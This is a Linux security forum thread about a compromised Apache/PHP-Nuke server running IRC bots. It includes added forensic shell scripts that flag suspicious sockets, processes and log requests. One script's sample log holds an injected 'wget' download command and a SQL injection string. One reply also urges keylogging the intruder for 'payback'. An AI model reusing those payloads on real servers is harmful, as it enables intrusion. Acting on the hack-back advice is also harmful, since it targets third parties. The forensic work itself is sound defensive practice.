Linux - Security
This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
I'm very worried about the security of my company's server. We only have a web server and sshd running on it.
It's a Mandrake 9.2 machine with apache2-2.0.47 on it. When looking at the syslog I started getting suspicious. I then did a netstat -anp, which made me even more worried. Here is how it looks:
Note: I've not used my server's real IP address (192.16.4.2)
I've found out that all these programs that are trying to access IRC (is this correct?) are running under the apache user, which means that our web server has been hacked, or so I think. Luckily the firewall is blocking these outgoing messages. Also there was a program called "mech" running, doing exactly the same as the programs above, but I've now killed it, so it's no longer running. It is also interesting that this mech program was located in /var/tmp/PsY/
Well I think it is quite obvious what my question is. Is there a vulnerability in my webserver configuration and how do I go about finding it? Any suggested reading that I should do?
Also I've been using tripwire, so I'm going to go through its report to try to find out what has happened.
I took the server off the Net. But I would really like to learn more about what happened, or else it will keep happening.
I've taken a look at the syslog and it seems shorewall started blocking these IRC requests on 23 March. So I've not been very observant :-(
Surely there is some way to search the relevant logs for events that happened around that time? I just don't know which logs to check. I'm guessing that whoever hacked the server wanted to keep this server accessible for later on, so there must be something in the startup scripts (or similar) that I can use to find more info.
I've also found out that apache now has port 4000 open (the door for the hacker, I'm guessing).
How would I find out if the person has hacked only apache or has been able to hack root?
I really want to use this bad experience as a way to learn more about security, so _any_ hints or additional info would really be appreciated.
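The netstat output the first post refers to did not survive in the thread, so here is an added example (not something the poster ran, and not part of the thread) of how to get from `netstat -anp` to "these processes run as apache and are talking to IRC". It joins netstat with `ps -eo pid,user,comm` so every socket is printed with the owning user, and flags connections to IRC ports, listeners on ports that should not be open (port 4000 here), and anything the web server's user is running that is not httpd. The two inputs are constructed sample data in the shape those commands print; the PIDs, the 192.16.4.2 address from the post and the two remote addresses are made up, and the allowed-port list and the service user name are assumptions.

```sh
#!/bin/sh
# Added example (not from the thread). On a live box, as root (netstat prints
# "-" instead of PIDs for other users' sockets), run:
#   netstat -anp > net.txt; ps -eo pid,user,comm > ps.txt
#   suspicious_sockets ps.txt net.txt

# Constructed `ps -eo pid,user,comm` output.
PS_SAMPLE='  PID USER     COMMAND
  987 root     sshd
 1124 root     httpd2
 2310 apache   mech
 2311 apache   init
 2315 apache   httpd'

# Constructed `netstat -anp` output (addresses are made up).
NETSTAT_SAMPLE='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1124/httpd2
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      987/sshd
tcp        0      0 0.0.0.0:4000            0.0.0.0:*               LISTEN      2311/init
tcp        0      1 192.16.4.2:33041        203.0.113.7:6667        SYN_SENT    2310/mech
tcp        0      1 192.16.4.2:33042        198.51.100.9:6667       SYN_SENT    2315/httpd
udp        0      0 0.0.0.0:68              0.0.0.0:*                           611/dhclient'

# Assumptions for this example: the ports the server is meant to listen on,
# and the unprivileged user the web server runs as.
ALLOWED_LISTEN_PORTS="22 80"
SERVICE_USER="apache"

suspicious_sockets() {
    # $1 = file with `ps -eo pid,user,comm` output
    # $2 = file with `netstat -anp` output
    # Prints: PID USER COMMAND LOCAL FOREIGN STATE REASONS (one line per flagged socket)
    awk -v allow="$ALLOWED_LISTEN_PORTS" -v svc="$SERVICE_USER" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        # First file: pid -> user and command name (skip the header line).
        NR == FNR {
            if ($1 ~ /^[0-9]+$/) { user[$1] = $2; comm[$1] = $3 }
            next
        }
        # Second file: keep only tcp/udp rows that carry a PID/Program column.
        $1 !~ /^(tcp|udp)/ || $NF !~ /^[0-9]+\// { next }
        {
            split($NF, pp, "/"); pid = pp[1]
            local = $4; foreign = $5
            state = (NF >= 7) ? $6 : "-"            # udp rows have no State column
            nl = split(local, lp, ":");  lport = lp[nl]
            nf = split(foreign, fp, ":"); fport = fp[nf]
            reasons = ""
            if (fport ~ /^[0-9]+$/ && fport + 0 >= 6660 && fport + 0 <= 7000)
                reasons = reasons "irc-client,"
            if (state == "LISTEN" && !(lport in ok))
                reasons = reasons "unexpected-listener,"
            if (user[pid] == svc && comm[pid] !~ /^httpd/)
                reasons = reasons "service-user-runs-" comm[pid] ","
            if (reasons != "")
                printf "%s %s %s %s %s %s %s\n", pid, user[pid], comm[pid],
                       local, foreign, state, substr(reasons, 1, length(reasons) - 1)
        }' "$1" "$2"
}

demo() {
    # Write the constructed samples to temp files and run the join over them.
    ps=$(mktemp); net=$(mktemp)
    printf '%s\n' "$PS_SAMPLE" > "$ps"
    printf '%s\n' "$NETSTAT_SAMPLE" > "$net"
    suspicious_sockets "$ps" "$net"
    rm -f "$ps" "$net"
}

demo
```

On the sample this prints three lines: mech and httpd (PID 2315) flagged as IRC clients, and the "init" on port 4000 flagged both as an unexpected listener and as a non-httpd process owned by the apache user. Two caveats a practitioner would add: the user column comes from ps on the same box, so a rootkit that hides processes hides them here too (the post above about knoppix-std applies), and a SYN_SENT state with Send-Q 1 is exactly what a firewall silently dropping the outbound connection looks like, which is why the shorewall log was the first place this showed up.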
How about you put a nice keylogger and another computer bridging the connection so you can sniff it without the hacker noticing it?
Now you let the hacker play around on your server and he is bound to log into something or do some stuff. So you log his passwords and get to know his IP and, as he seems to like IRC, his nick and other info on him. You might even find out how he is getting in.
You would hack the hacker. You can then do what you want, but I would say payback time.
First let me say that a complete format and reinstall will be necessary when you're done doing forensics.
Probably good places to start looking would be to take a look at the apache/httpd logs for any abnormal error messages. Also look through the general system logs for anything suspicious. You should definitely download and run rootkit hunter and chkrootkit on the system, as there are a bunch of things listening as services that shouldn't be (like init for example), which makes a rootkit likely. If that's the case, then you may need to use a cd-based distro like knoppix-std or FIRE to do any further analysis.
You may have some luck looking those processes up by their process ID number in /proc/<PID>/cmdline. If you find anything interesting there (like a path to the binary) take a look at the contents and see what you can find.
With regards to how you got cracked, what version of apache were you running? Were you hosting any content other than static html pages, like cgi or php for example? File permissions for stuff in the server root?
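An added example (mine, not code from the poster above) of the /proc check suggested in that post, carried a bit further than cmdline alone: for each PID it reads /proc/PID/cmdline, /proc/PID/exe and /proc/PID/cwd and flags the three things this incident shows, a binary that lives under /tmp or /var/tmp, a binary that was unlinked after it started (the kernel appends " (deleted)" to the exe link), and an argv[0] that does not match the executable actually mapped, which is what a fake "init" or a bot calling itself "httpd" looks like. The proc root is a parameter so the constructed fake tree built by build_fake_proc() can stand in for /proc; its PIDs, paths and names are made up, with /var/tmp/PsY taken from the thread.

```sh
#!/bin/sh
# Added example (not from the thread). Live use, as root: scan_proc /proc

inspect_pid() {
    # $1 = pid, $2 = proc root (default /proc)
    # Prints: PID FLAGS exe=... cwd=... argv0=...   (FLAGS is "ok" when nothing was flagged)
    pid=$1
    pd="${2:-/proc}/$pid"
    [ -d "$pd" ] || { printf '%s missing\n' "$pid"; return 1; }
    exe=$(readlink "$pd/exe" 2>/dev/null) || exe="?"   # only root can read other users' exe links
    cwd=$(readlink "$pd/cwd" 2>/dev/null) || cwd="?"
    argv0=$(tr '\000' '\n' < "$pd/cmdline" 2>/dev/null | head -n 1)
    argv0=${argv0#-}                                   # login shells prefix argv[0] with "-"
    exe_path=${exe%" (deleted)"}                       # strip the kernel's unlinked-binary marker
    flags=""
    case "$exe_path" in /tmp/*|/var/tmp/*|/dev/shm/*) flags="$flags scratch-dir" ;; esac
    if [ "$exe_path" != "$exe" ]; then flags="$flags exe-deleted"; fi
    case "$cwd" in /tmp/*|/var/tmp/*|/dev/shm/*) flags="$flags scratch-cwd" ;; esac
    # argv[0] is whatever the process chose to call itself; compare basenames with the real binary.
    if [ -n "$argv0" ] && [ "$exe" != "?" ] && [ "${argv0##*/}" != "${exe_path##*/}" ]; then
        flags="$flags argv0-mismatch"
    fi
    flags=${flags# }
    printf '%s %s exe=%s cwd=%s argv0=%s\n' "$pid" "${flags:-ok}" "$exe" "$cwd" "$argv0"
}

scan_proc() {
    # Report every numeric entry under the proc root (default /proc).
    r=${1:-/proc}
    for d in "$r"/[0-9]*; do
        if [ -d "$d" ]; then inspect_pid "${d##*/}" "$r"; fi
    done
}

build_fake_proc() {
    # Constructed stand-in for /proc with three made-up processes; prints its path.
    r=$(mktemp -d)
    mkdir -p "$r/987" "$r/2310" "$r/2311"
    # 987: a legitimate sshd
    printf '/usr/sbin/sshd\000' > "$r/987/cmdline"
    ln -s /usr/sbin/sshd "$r/987/exe"; ln -s / "$r/987/cwd"
    # 2311: calls itself "init", but the binary is the one dropped in /var/tmp/PsY
    printf 'init\000' > "$r/2311/cmdline"
    ln -s /var/tmp/PsY/init "$r/2311/exe"; ln -s /var/tmp/PsY "$r/2311/cwd"
    # 2310: the IRC bot, argv[0] forged to look like httpd, binary already unlinked from disk
    printf 'httpd\000-f\000conf\000' > "$r/2310/cmdline"
    ln -s "/var/tmp/PsY/mech (deleted)" "$r/2310/exe"; ln -s /var/tmp/PsY "$r/2310/cwd"
    printf '%s\n' "$r"
}

# Stand-alone run over the constructed tree.
fake=$(build_fake_proc)
scan_proc "$fake"
rm -rf "$fake"
```

Two things worth knowing when running this for real: an exe link that reads "(deleted)" still lets you copy the running binary out with `cp /proc/PID/exe /some/evidence/dir` before you kill the process, which is the only way to recover a tool the intruder removed from disk; and if a kernel-level rootkit is in place, /proc itself is what it lies through, so a clean result here is not proof of a clean box, which is the reason for the boot-CD advice above.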
I'm not in front of my server right now, so all the info I post now is out of my head.
I will make sure that I format and reinstall once I've done my detective work.
I have run chkrootkit and found an infected item (I will post more detail later, when I'm in front of my box) listening on port 4000.
I've found the directory where the hacker downloaded/placed his tools. It's in /var/tmp, if I'm not mistaken, and that directory is owned by the apache user. And yes, init was running and located in this directory. What is the relevance of init running?
Quote:
With regards to how you got cracked, what version of apache were you running? Were you hosting any content other than static html pages, like cgi or php for example? File permission for stuff in the server root?
I was running apache 2.0.47, with a php-nuke based site. I've not heard of any hacks against php-nuke, so it might have been the apache version that had problems? There were very few ports open, a few required ports, port 80, and port 22 (for SSH, used only with private/public keys).
Thanks very much for the links, I see I have much reading to do.
I've read up on phpnuke too, and wanted to start a website using that program, but I was apprehensive about it.
To prevent something like this again, you might want to try the patched versions from Nuke fixes, which, among other things, filter out mysql injection attacks.
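Tying the last two posts back to the question of which logs to read: an added example (not from anyone in the thread) that searches an Apache access log for the request shapes that fit this incident, SQL injection attempts of the kind the Nuke fixes filter, and queries that carry download commands or /var/tmp paths, then counts hits per client so the attacker's address falls out. The indicator patterns are my own starting point, not a PHP-Nuke signature set, and the four log lines are constructed in combined-log format with made-up addresses; the 23 March date is the one from the thread.

```sh
#!/bin/sh
# Added example (not from the thread). Live use: scan_access_log /var/log/httpd/access_log

# Constructed combined-format access log (clients, timestamps and URLs are made up).
ACCESS_LOG_SAMPLE='203.0.113.7 - - [23/Mar/2004:02:11:07 +0200] "GET /modules.php?name=News&file=article&sid=1 HTTP/1.0" 200 8123 "-" "Mozilla/4.0"
203.0.113.7 - - [23/Mar/2004:02:11:31 +0200] "GET /modules.php?name=Search&query=x%27%20UNION%20SELECT%201,2,3/* HTTP/1.0" 200 2210 "-" "Mozilla/4.0"
203.0.113.7 - - [23/Mar/2004:02:14:02 +0200] "GET /modules.php?name=Foo&x=cd%20/var/tmp;wget%20http://198.51.100.9/PsY.tgz HTTP/1.0" 200 120 "-" "Mozilla/4.0"
192.0.2.44 - - [23/Mar/2004:02:15:40 +0200] "GET /index.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"'

scan_access_log() {
    # $1 = access log in combined format.
    # Prints: TAGS <tab> CLIENT <tab> REQUEST for each line matching an indicator.
    awk '
        function hexval(h,  i, v) {
            v = 0
            for (i = 1; i <= length(h); i++)
                v = v * 16 + index("0123456789abcdef", tolower(substr(h, i, 1))) - 1
            return v
        }
        function urldecode(s,  out) {       # enough to see through %27 and %20 in a query string
            out = ""
            while (match(s, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
                out = out substr(s, 1, RSTART - 1) sprintf("%c", hexval(substr(s, RSTART + 1, 2)))
                s = substr(s, RSTART + 3)
            }
            return out s
        }
        {
            split($0, q, "\"")                # the request line is the first quoted field
            req = q[2]
            split(req, r, " ")
            u = tolower(urldecode(r[2]))      # decoded, lower-cased URL path + query
            tags = ""
            if (u ~ /union[^a-z]+select|\/\*|char\(|benchmark\(/) tags = tags "sql-injection,"
            if (u ~ /wget|curl|\/var\/tmp|\/tmp\/|\/dev\/shm/)    tags = tags "fetch-or-scratch-path,"
            if (u ~ /\.\.\//)                                     tags = tags "traversal,"
            if (tags != "")
                printf "%s\t%s\t%s\n", substr(tags, 1, length(tags) - 1), $1, req
        }' "$1"
}

attacker_candidates() {
    # Flagged requests per client address, most active first.
    scan_access_log "$1" | cut -f2 | sort | uniq -c | sort -rn
}

# Stand-alone run over the constructed sample.
log=$(mktemp)
printf '%s\n' "$ACCESS_LOG_SAMPLE" > "$log"
scan_access_log "$log"
attacker_candidates "$log"
rm -f "$log"
```

The decoder matters more than it looks: the injection in the sample arrives as `%27%20UNION%20SELECT`, so a plain `grep -i 'union select'` over the raw log misses it. Once the first hit is dated, that timestamp is the anchor for reading everything else (error_log, the shorewall drops in syslog, and file mtimes under /var/tmp) around the same minutes.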